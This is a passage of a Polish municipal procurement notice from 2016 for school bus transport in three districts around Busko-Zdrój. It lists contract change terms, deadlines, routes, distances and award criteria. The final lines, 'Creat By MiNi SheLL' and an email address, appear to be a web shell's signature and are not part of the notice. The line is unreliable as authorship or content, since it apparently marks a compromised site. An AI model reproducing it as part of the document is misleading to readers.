<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy.
1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.
2. Zmiana postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadku: 
a) wystąpienia ograniczenia zakresu przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, na skutek okoliczności,  których nie można było przewidzieć na etapie przygotowania zakresu rzeczowego,
b) wystąpienia nieistotnych zmian tj. zmian, które nie mają wpływu na tzw. konieczne warunki Umowy  (termin, zakres, wartość Umowy).
3. Zmiana zakresu rzeczowego umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie ilości  i rodzaju tras może nastąpić w przypadku wystąpienia: 
a) zmiany sieci jednostek oświatowych,
b) reorganizacji jednostek oświatowych,
c) reorganizacji czasu zajęć lekcyjnych w jednostkach, 
d) zmiany liczby dowożonych uczniów.
4. Zmiana wartości przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadkach:
a) zmian zakresu rzeczowego Umowy, o których mowa w pkt. 3, tj. odpowiednio:
- zmniejszone o odpowiednią kwotę - w przypadku przejechania mniejszej ilości kilometrów,
- zwiększone o odpowiednią kwotę - w przypadku przejechania większej ilości kilometrów;
b) urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój pok. Nr 44.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.07.2016 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój pok. Nr 3 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowóz uczniów w Okręgu I do następujących jednostek oświatowych: Zespół Placówek Oświatowych w Szańcu, Samorządowe Gimnazjum w Podgajach, Szkoła Podstawowa w Kołaczkowicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasy:
nr 1/I: Galów - Mikułowice - Szaniec - Podgaje,
nr 2/I: Skorzów - Młyny - Podgaje,
nr 3/I: Balice - Kołaczkowice - Podgaje,
nr 4/I: Widuchowa - Podgaje - Kołaczkowice,
nr 5/I: Grabda I - Kołaczkowice - Podgaje,
nr 6/I: Młyny - Mikułowice - Skorzów.
Łączną dzienną długość dowozu w Okręgu I szacuje się na 326,9 km, roczną długość przejazdów w Okręgu I szacuje się na 62 437,90 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Czas podstawienia autobusu w przypadku awarii - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz uczniów w Okręgu II do następujących jednostek oświatowych: Zespół Placówek Oświatowych w Zbludowicach, Szkoły Podstawowe w: Dobrowodzie i Siesławicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasy:
nr 1/II: Żerniki Górne - Busko-Zdrój - Zbludowice,
nr 2/II: Szczaworyż - Skotniki Małe - Zbludowice,
nr 3/II: Wolica - Zbludowice,
nr 4/II: Baranów - Dobrowoda,
nr 5/II: Dobrowoda - Zbludowice,
nr 6/II: Las Winiarski - Szaniec - Busko-Zdrój - Zbludowice,
nr 7/II: Kostki Małe - Zbludowice,
nr 8/II: Chotelek - Siesławice - Zbludowice. 
Łączną dzienną długość dowozu w Okręgu II szacuje się na: 336,0 km, roczną długość przejazdów w Okręgu I szacuje się na 64 176,00 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Czas podstawienia autobusu w przypadku awarii - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dowóz uczniów w Okręgu III do następujących jednostek oświatowych: Zespół Placówek Oświatowych Nr 1 w Busku - Zdroju, Samorządowe Gimnazjum Nr 1 w Busku - Zdroju, Szkoły Podstawowe Nr 2 i Nr 3               w Busku - Zdroju.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasy:
nr 1/III: N. Folwark - Mikułowice - Busko-Zdrój,
nr 2/III: Widuchowa - Owczary - Łagiewniki - Busko-Zdrój,
nr 3/III: Wełecz - Busko - Zdrój,
nr 4/III: Wełecz - Busko - Zdrój, ul. Rehabilitacyjna.
Łączną dzienną długość dowozu w Okręgu III szacuje się na: 138,00 km, roczną długość przejazdów w Okręgu III szacuje się na 26 358,00 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Czas podstawienia autobusu w przypadku awarii - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com